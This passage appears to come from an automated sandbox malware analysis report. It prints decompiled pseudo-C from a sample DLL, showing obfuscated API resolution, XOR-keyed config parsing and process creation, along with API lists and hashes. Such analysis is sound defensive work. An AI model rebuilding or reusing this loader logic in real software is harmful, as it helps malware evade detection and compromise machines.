                                          										 *_t102 = _t125;
                                          										 *0x677d198 = _t102;
                                          									}
                                          								}
                                          							}
                                          							goto L18;
                                          						}
                                          						_v40 = GetLastError();
                                          						_t104 =  *0x677d19c; // 0x0
                                          						if(_t104 == 0) {
                                          							L12:
                                          							_a8 =  &_v72;
                                          							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                          							return _v44;
                                          						}
                                          						_t138 =  *_t104(3,  &_v72);
                                          						if(_t138 != 0) {
                                          							goto L13;
                                          						}
                                          						goto L12;
                                          					}
                                          					_t138 =  *_t98(1,  &_v72);
                                          					if(_t138 != 0) {
                                          						goto L13;
                                          					}
                                          					goto L9;
                                          				}
                                          				_t116 =  *_t82(0,  &_v72);
                                          				if(_t116 != 0) {
                                          					goto L33;
                                          				}
                                          				goto L6;
                                          			}


































                                          APIs
                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0677AE1E
                                          • LoadLibraryA.KERNEL32(?), ref: 0677AE9B
                                          • GetLastError.KERNEL32 ref: 0677AEA7
                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0677AEDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                          • String ID: $
                                          • API String ID: 948315288-3993045852
                                          • Opcode ID: b6d52a515baccd2c94fc6548322323a7a538bb8bc68b4b5b65e513e6d2e298c8
                                          • Instruction ID: 7716d0ca2a0fc533f83a57c9ea405b29adfc54a56f296c5928cb897f44daf718
                                          • Opcode Fuzzy Hash: b6d52a515baccd2c94fc6548322323a7a538bb8bc68b4b5b65e513e6d2e298c8
                                          • Instruction Fuzzy Hash: 7C8109B1A10209AFEF65CFA9D885AADB7F6FF48310F158129EA05E7240E770E945CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 56%
                                          			E067730FC(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				char _v16;
                                          				signed int _v20;
                                          				void* __esi;
                                          				intOrPtr _t42;
                                          				intOrPtr _t44;
                                          				void* _t46;
                                          				void* _t47;
                                          				void* _t48;
                                          				int _t49;
                                          				intOrPtr _t53;
                                          				WCHAR* _t56;
                                          				void* _t57;
                                          				int _t58;
                                          				intOrPtr _t64;
                                          				void* _t69;
                                          				intOrPtr* _t73;
                                          				void* _t74;
                                          				intOrPtr _t75;
                                          				intOrPtr _t79;
                                          				intOrPtr* _t85;
                                          				intOrPtr _t88;
                                          
                                          				_t74 = __ecx;
                                          				_t79 =  *0x677d33c; // 0x6c49bb0
                                          				_v20 = 8;
                                          				_v16 = GetTickCount();
                                          				_t42 = E06779810(_t74,  &_v16);
                                          				_v12 = _t42;
                                          				if(_t42 == 0) {
                                          					_v12 = 0x677c19c;
                                          				}
                                          				_t44 = E067747E1(_t79);
                                          				_v8 = _t44;
                                          				if(_t44 != 0) {
                                          					_t85 = __imp__;
                                          					_t46 =  *_t85(_v12, _t69);
                                          					_t47 =  *_t85(_v8);
                                          					_t48 =  *_t85(_a4);
                                          					_t49 = lstrlenW(_a8);
                                          					_t53 = E067758BE(lstrlenW(0x677eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x677eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
                                          					_v16 = _t53;
                                          					if(_t53 != 0) {
                                          						_t75 =  *0x677d2a4; // 0x4ca5a8
                                          						_t73 =  *0x677d11c; // 0x677abc9
                                          						_t18 = _t75 + 0x677eb38; // 0x530025
                                          						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
                                          						_t56 =  *_t85(_v8);
                                          						_a8 = _t56;
                                          						_t57 =  *_t85(_a4);
                                          						_t58 = lstrlenW(_a12);
                                          						_t88 = E067758BE(lstrlenW(0x677ec58) + _a8 + _t57 + _t58 + lstrlenW(0x677ec58) + _a8 + _t57 + _t58 + 2);
                                          						if(_t88 == 0) {
                                          							E0677147E(_v16);
                                          						} else {
                                          							_t64 =  *0x677d2a4; // 0x4ca5a8
                                          							_t31 = _t64 + 0x677ec58; // 0x73006d
                                          							 *_t73(_t88, _t31, _a4, _v8, _a12);
                                          							 *_a16 = _v16;
                                          							_v20 = _v20 & 0x00000000;
                                          							 *_a20 = _t88;
                                          						}
                                          					}
                                          					E0677147E(_v8);
                                          				}
                                          				return _v20;
                                          			}



























                                          APIs
                                          • GetTickCount.KERNEL32 ref: 06773111
                                          • lstrlen.KERNEL32(00000000,80000002), ref: 0677314C
                                          • lstrlen.KERNEL32(?), ref: 06773155
                                          • lstrlen.KERNEL32(00000000), ref: 0677315C
                                          • lstrlenW.KERNEL32(80000002), ref: 0677316A
                                          • lstrlenW.KERNEL32(0677EB38), ref: 06773173
                                          • lstrlen.KERNEL32(?), ref: 067731B7
                                          • lstrlen.KERNEL32(?), ref: 067731BF
                                          • lstrlenW.KERNEL32(?), ref: 067731CA
                                          • lstrlenW.KERNEL32(0677EC58), ref: 067731D3
                                            • Part of subcall function 0677147E: HeapFree.KERNEL32(00000000,00000000,06771D11,00000000,?,?,-00000008), ref: 0677148A
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$CountFreeHeapTick
                                          • String ID:
                                          • API String ID: 2535036572-0
                                          • Opcode ID: fef1c14de750f7cf90df1dd2aad9fc0476d85366f291d5234ee14939cf98ce38
                                          • Instruction ID: 923a2c19f6d25e1be012131d4c199e9190986683ca494771ba7c4f1ffb34d82c
                                          • Opcode Fuzzy Hash: fef1c14de750f7cf90df1dd2aad9fc0476d85366f291d5234ee14939cf98ce38
                                          • Instruction Fuzzy Hash: 2D313B76D00219EFCF11AFA4CC44C9E7FB6EF48254B158495EA14A7211DB35DA11EF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 73%
                                          			E06771493(void* __eax, void* __ecx) {
                                          				long _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				void* _v28;
                                          				long _v32;
                                          				void _v104;
                                          				char _v108;
                                          				long _t36;
                                          				intOrPtr _t39;
                                          				intOrPtr _t46;
                                          				intOrPtr _t49;
                                          				void* _t57;
                                          				void* _t66;
                                          				intOrPtr _t67;
                                          				intOrPtr* _t68;
                                          				intOrPtr* _t69;
                                          
                                          				_t1 = __eax + 0x14; // 0x74183966
                                          				_t67 =  *_t1;
                                          				_t36 = E067757D8(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
                                          				_v8 = _t36;
                                          				if(_t36 != 0) {
                                          					L12:
                                          					return _v8;
                                          				}
                                          				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
                                          				_t39 = _v12(_v12);
                                          				_v8 = _t39;
                                          				if(_t39 == 0 && ( *0x677d260 & 0x00000001) != 0) {
                                          					_v32 = 0;
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					_v108 = 0;
                                          					memset( &_v104, 0, 0x40);
                                          					_t46 =  *0x677d2a4; // 0x4ca5a8
                                          					_t18 = _t46 + 0x677e3e6; // 0x73797325
                                          					_t66 = E067777E6(_t18);
                                          					if(_t66 == 0) {
                                          						_v8 = 8;
                                          					} else {
                                          						_t49 =  *0x677d2a4; // 0x4ca5a8
                                          						_t19 = _t49 + 0x677e747; // 0x6c48cef
                                          						_t20 = _t49 + 0x677e0af; // 0x4e52454b
                                          						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                          						if(_t69 == 0) {
                                          							_v8 = 0x7f;
                                          						} else {
                                          							_v108 = 0x44;
                                          							E0677684E();
                                          							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                          							_push(1);
                                          							E0677684E();
                                          							if(_t57 == 0) {
                                          								_v8 = GetLastError();
                                          							} else {
                                          								CloseHandle(_v28);
                                          								CloseHandle(_v32);
                                          							}
                                          						}
                                          						HeapFree( *0x677d238, 0, _t66);
                                          					}
                                          				}
                                          				_t68 = _v16;
                                          				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
                                          				E0677147E(_t68);
                                          				goto L12;
                                          			}




















                                          APIs
                                            • Part of subcall function 067757D8: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,067714AF,?,?,?,?,00000000,00000000), ref: 067757FD
                                            • Part of subcall function 067757D8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 0677581F
                                            • Part of subcall function 067757D8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 06775835
                                            • Part of subcall function 067757D8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0677584B
                                            • Part of subcall function 067757D8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 06775861
                                            • Part of subcall function 067757D8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 06775877
                                          • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 067714C5
                                          • memset.NTDLL ref: 06771500
                                            • Part of subcall function 067777E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,0677333A,73797325), ref: 067777F7
                                            • Part of subcall function 067777E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 06777811
                                          • GetModuleHandleA.KERNEL32(4E52454B,06C48CEF,73797325), ref: 06771536
                                          • GetProcAddress.KERNEL32(00000000), ref: 0677153D
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 067715A5
                                            • Part of subcall function 0677684E: GetProcAddress.KERNEL32(36776F57,0677935F), ref: 06776869
                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 06771582
                                          • CloseHandle.KERNEL32(?), ref: 06771587
                                          • GetLastError.KERNEL32(00000001), ref: 0677158B
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                          • String ID:
                                          • API String ID: 478747673-0
                                          • Opcode ID: e9677c948723f390082bc2b8b6bf667da043dd43d5c7f000fdd6b0d22fb832a9
                                          • Instruction ID: dd83a5366b9aee6ddcaf417bf3e23f96611c81daee98153b3dc0cd04ed3e463e
                                          • Opcode Fuzzy Hash: e9677c948723f390082bc2b8b6bf667da043dd43d5c7f000fdd6b0d22fb832a9
                                          • Instruction Fuzzy Hash: C03139B2D00209AFDF61AFA4DC88DAEBBBDEF08244F544565E606E7110D6359A44DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 63%
                                          			E06774D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				intOrPtr _v8;
                                          				intOrPtr _t9;
                                          				intOrPtr _t13;
                                          				char* _t28;
                                          				void* _t33;
                                          				void* _t34;
                                          				char* _t36;
                                          				intOrPtr* _t40;
                                          				char* _t41;
                                          				char* _t42;
                                          				char* _t43;
                                          
                                          				_t34 = __edx;
                                          				_push(__ecx);
                                          				_t9 =  *0x677d2a4; // 0x4ca5a8
                                          				_t1 = _t9 + 0x677e62c; // 0x253d7325
                                          				_t36 = 0;
                                          				_t28 = E06776027(__ecx, _t1);
                                          				if(_t28 != 0) {
                                          					_t40 = __imp__;
                                          					_t13 =  *_t40(_t28);
                                          					_v8 = _t13;
                                          					_t41 = E067758BE(_v8 +  *_t40(_a4) + 1);
                                          					if(_t41 != 0) {
                                          						strcpy(_t41, _t28);
                                          						_pop(_t33);
                                          						__imp__(_t41, _a4);
                                          						_t36 = E06776F33(_t34, _t41, _a8);
                                          						E0677147E(_t41);
                                          						_t42 = E06774759(StrTrimA(_t36, "="), _t36);
                                          						if(_t42 != 0) {
                                          							E0677147E(_t36);
                                          							_t36 = _t42;
                                          						}
                                          						_t43 = E06774858(_t36, _t33);
                                          						if(_t43 != 0) {
                                          							E0677147E(_t36);
                                          							_t36 = _t43;
                                          						}
                                          					}
                                          					E0677147E(_t28);
                                          				}
                                          				return _t36;
                                          			}














                                          APIs
                                            • Part of subcall function 06776027: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,06774D46,253D7325,00000000,00000000,74ECC740,?,?,067752FE,?), ref: 0677608E
                                            • Part of subcall function 06776027: sprintf.NTDLL ref: 067760AF
                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,067752FE,?,06C495B0), ref: 06774D57
                                          • lstrlen.KERNEL32(?,?,?,067752FE,?,06C495B0), ref: 06774D5F
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • strcpy.NTDLL ref: 06774D76
                                          • lstrcat.KERNEL32(00000000,?), ref: 06774D81
                                            • Part of subcall function 06776F33: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,06774D90,00000000,?,?,?,067752FE,?,06C495B0), ref: 06776F4A
                                            • Part of subcall function 0677147E: HeapFree.KERNEL32(00000000,00000000,06771D11,00000000,?,?,-00000008), ref: 0677148A
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,067752FE,?,06C495B0), ref: 06774D9E
                                            • Part of subcall function 06774759: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,06774DAA,00000000,?,?,067752FE,?,06C495B0), ref: 06774763
                                            • Part of subcall function 06774759: _snprintf.NTDLL ref: 067747C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586
                                          • Opcode ID: 35c50b40b8c9d004a14893240197b6b56aa408bda7f345456b3caee5735341fe
                                          • Instruction ID: 085d78644519c7aeca0144f05b1098588fb26405f0b26f36ad73247559cfd918
                                          • Opcode Fuzzy Hash: 35c50b40b8c9d004a14893240197b6b56aa408bda7f345456b3caee5735341fe
                                          • Instruction Fuzzy Hash: C711C673A012257B8FA2BBF49C48C6F3AAD9F495643154115F724FB108DE34DD0197E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E067798F7(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                                          				int _v8;
                                          				void* _v12;
                                          				signed int _t18;
                                          				signed int _t23;
                                          				void* _t28;
                                          				char* _t29;
                                          				char* _t30;
                                          				char* _t31;
                                          				char* _t32;
                                          				char* _t33;
                                          				void* _t34;
                                          				void* _t35;
                                          				signed int _t41;
                                          				void* _t43;
                                          				void* _t44;
                                          				signed int _t46;
                                          				signed int _t50;
                                          				signed int _t54;
                                          				signed int _t58;
                                          				signed int _t62;
                                          				signed int _t66;
                                          				void* _t69;
                                          				void* _t70;
                                          				void* _t80;
                                          				void* _t83;
                                          				intOrPtr _t86;
                                          
                                          				_t83 = __esi;
                                          				_t80 = __edi;
                                          				_t72 = __ecx;
                                          				_t69 = __ebx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t18 =  *0x677d2a0; // 0x59935a40
                                          				if(E067796D5( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
                                          					 *0x677d2d0 = _v12;
                                          				}
                                          				_t23 =  *0x677d2a0; // 0x59935a40
                                          				if(E067796D5( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
                                          					_t28 = 2;
                                          					return _t28;
                                          				} else {
                                          					_push(_t69);
                                          					_t70 = _v12;
                                          					_push(_t83);
                                          					_push(_t80);
                                          					if(_t70 == 0) {
                                          						_t29 = 0;
                                          					} else {
                                          						_t66 =  *0x677d2a0; // 0x59935a40
                                          						_t29 = E067710CA(_t72, _t70, _t66 ^ 0x48b4463f);
                                          					}
                                          					if(_t29 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
                                          							 *0x677d240 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t30 = 0;
                                          					} else {
                                          						_t62 =  *0x677d2a0; // 0x59935a40
                                          						_t30 = E067710CA(_t72, _t70, _t62 ^ 0x11ba0dc3);
                                          					}
                                          					if(_t30 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
                                          							 *0x677d244 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t31 = 0;
                                          					} else {
                                          						_t58 =  *0x677d2a0; // 0x59935a40
                                          						_t31 = E067710CA(_t72, _t70, _t58 ^ 0x01dd0365);
                                          					}
                                          					if(_t31 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                          							 *0x677d248 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t32 = 0;
                                          					} else {
                                          						_t54 =  *0x677d2a0; // 0x59935a40
                                          						_t32 = E067710CA(_t72, _t70, _t54 ^ 0x3cf823ca);
                                          					}
                                          					if(_t32 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                          							 *0x677d004 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t33 = 0;
                                          					} else {
                                          						_t50 =  *0x677d2a0; // 0x59935a40
                                          						_t33 = E067710CA(_t72, _t70, _t50 ^ 0x0cf9b7cf);
                                          					}
                                          					if(_t33 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                          							 *0x677d02c = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t34 = 0;
                                          					} else {
                                          						_t46 =  *0x677d2a0; // 0x59935a40
                                          						_t34 = E067710CA(_t72, _t70, _t46 ^ 0x163b337e);
                                          					}
                                          					if(_t34 != 0) {
                                          						_push(_t34);
                                          						_t43 = 0x10;
                                          						_t44 = E0677A2EF(_t43);
                                          						if(_t44 != 0) {
                                          							_push(_t44);
                                          							E06779B10();
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t35 = 0;
                                          					} else {
                                          						_t41 =  *0x677d2a0; // 0x59935a40
                                          						_t35 = E067710CA(_t72, _t70, _t41 ^ 0x89f501b6);
                                          					}
                                          					if(_t35 != 0 && E0677A2EF(0, _t35) != 0) {
                                          						_t86 =  *0x677d324; // 0x6c495b0
                                          						E06774C3A(_t86 + 4, _t39);
                                          					}
                                          					HeapFree( *0x677d238, 0, _t70);
                                          					return 0;
                                          				}
                                          			}





























                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0677D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,06774A8B), ref: 0677997B
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0677D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,06774A8B), ref: 067799AD
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0677D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,06774A8B), ref: 067799DF
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0677D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,06774A8B), ref: 06779A11
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0677D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,06774A8B), ref: 06779A43
                                          • HeapFree.KERNEL32(00000000,?,00000005,0677D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,06774A8B), ref: 06779AC3
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: a5e7ab7d9c1316c483f192299a77ae66b02e183d0d26b0d8d9114a69ebe014e3
                                          • Instruction ID: fccd9f4a52c3417fe9ab940403a4b72968d9d01a19ead6e3226831708b06383f
                                          • Opcode Fuzzy Hash: a5e7ab7d9c1316c483f192299a77ae66b02e183d0d26b0d8d9114a69ebe014e3
                                          • Instruction Fuzzy Hash: C9517571F12204EEDFA0EBB9DD88D6F76EEEFC86007654925A701D7108EA71D941CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 067713B5
                                          • SysAllocString.OLEAUT32(0070006F), ref: 067713C9
                                          • SysAllocString.OLEAUT32(00000000), ref: 067713DB
                                          • SysFreeString.OLEAUT32(00000000), ref: 06771443
                                          • SysFreeString.OLEAUT32(00000000), ref: 06771452
                                          • SysFreeString.OLEAUT32(00000000), ref: 0677145D
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: bdf1e80c50a5bcb8dea7638deb8c414cbc15bfcd27fadf158e8fb997b33d7a95
                                          • Instruction ID: 8108ddcb7063dfec48dd9726e3c8c8f06cefc7615d8e59fb59de8d5c41c5d93a
                                          • Opcode Fuzzy Hash: bdf1e80c50a5bcb8dea7638deb8c414cbc15bfcd27fadf158e8fb997b33d7a95
                                          • Instruction Fuzzy Hash: 91416F36D00609AFDF42EFFCD844AAEB7BAEF49205F548425EE14EB110DA71D906CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E067757D8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                          				intOrPtr _v8;
                                          				intOrPtr _t23;
                                          				intOrPtr _t26;
                                          				_Unknown_base(*)()* _t28;
                                          				intOrPtr _t30;
                                          				_Unknown_base(*)()* _t32;
                                          				intOrPtr _t33;
                                          				_Unknown_base(*)()* _t35;
                                          				intOrPtr _t36;
                                          				_Unknown_base(*)()* _t38;
                                          				intOrPtr _t39;
                                          				_Unknown_base(*)()* _t41;
                                          				intOrPtr _t44;
                                          				struct HINSTANCE__* _t48;
                                          				intOrPtr _t54;
                                          
                                          				_t54 = E067758BE(0x20);
                                          				if(_t54 == 0) {
                                          					_v8 = 8;
                                          				} else {
                                          					_t23 =  *0x677d2a4; // 0x4ca5a8
                                          					_t1 = _t23 + 0x677e11a; // 0x4c44544e
                                          					_t48 = GetModuleHandleA(_t1);
                                          					_t26 =  *0x677d2a4; // 0x4ca5a8
                                          					_t2 = _t26 + 0x677e769; // 0x7243775a
                                          					_v8 = 0x7f;
                                          					_t28 = GetProcAddress(_t48, _t2);
                                          					 *(_t54 + 0xc) = _t28;
                                          					if(_t28 == 0) {
                                          						L8:
                                          						E0677147E(_t54);
                                          					} else {
                                          						_t30 =  *0x677d2a4; // 0x4ca5a8
                                          						_t5 = _t30 + 0x677e756; // 0x614d775a
                                          						_t32 = GetProcAddress(_t48, _t5);
                                          						 *(_t54 + 0x10) = _t32;
                                          						if(_t32 == 0) {
                                          							goto L8;
                                          						} else {
                                          							_t33 =  *0x677d2a4; // 0x4ca5a8
                                          							_t7 = _t33 + 0x677e40b; // 0x6e55775a
                                          							_t35 = GetProcAddress(_t48, _t7);
                                          							 *(_t54 + 0x14) = _t35;
                                          							if(_t35 == 0) {
                                          								goto L8;
                                          							} else {
                                          								_t36 =  *0x677d2a4; // 0x4ca5a8
                                          								_t9 = _t36 + 0x677e4d2; // 0x4e6c7452
                                          								_t38 = GetProcAddress(_t48, _t9);
                                          								 *(_t54 + 0x18) = _t38;
                                          								if(_t38 == 0) {
                                          									goto L8;
                                          								} else {
                                          									_t39 =  *0x677d2a4; // 0x4ca5a8
                                          									_t11 = _t39 + 0x677e779; // 0x6c43775a
                                          									_t41 = GetProcAddress(_t48, _t11);
                                          									 *(_t54 + 0x1c) = _t41;
                                          									if(_t41 == 0) {
                                          										goto L8;
                                          									} else {
                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                          										_t44 = E06777B01(_t54, _a8);
                                          										_v8 = _t44;
                                          										if(_t44 != 0) {
                                          											goto L8;
                                          										} else {
                                          											 *_a12 = _t54;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v8;
                                          			}

                                          APIs
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,067714AF,?,?,?,?,00000000,00000000), ref: 067757FD
                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 0677581F
                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 06775835
                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0677584B
                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 06775861
                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 06775877
                                            • Part of subcall function 06777B01: memset.NTDLL ref: 06777B80
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                          • String ID:
                                          • API String ID: 1886625739-0
                                          • Opcode ID: 494718cb08cda428d91ddfd7972198d75880d344a4e2a0823207663b1099ac64
                                          • Instruction ID: 62a3148e6e8ccc88c2d59ba10bcdb50167a5a16ca63435e96bf1b7888c0de3ca
                                          • Opcode Fuzzy Hash: 494718cb08cda428d91ddfd7972198d75880d344a4e2a0823207663b1099ac64
                                          • Instruction Fuzzy Hash: 032181B0A1070BEFEB60DF69CC44D6AB7EDEF442147048565EA08DB211EB74E905CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E0677A642(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
                                          				signed int _v8;
                                          				char _v12;
                                          				signed int* _v16;
                                          				void _v284;
                                          				void* __esi;
                                          				char* _t60;
                                          				intOrPtr* _t61;
                                          				intOrPtr _t65;
                                          				char _t68;
                                          				intOrPtr _t72;
                                          				void* _t73;
                                          				intOrPtr _t75;
                                          				void* _t78;
                                          				void* _t88;
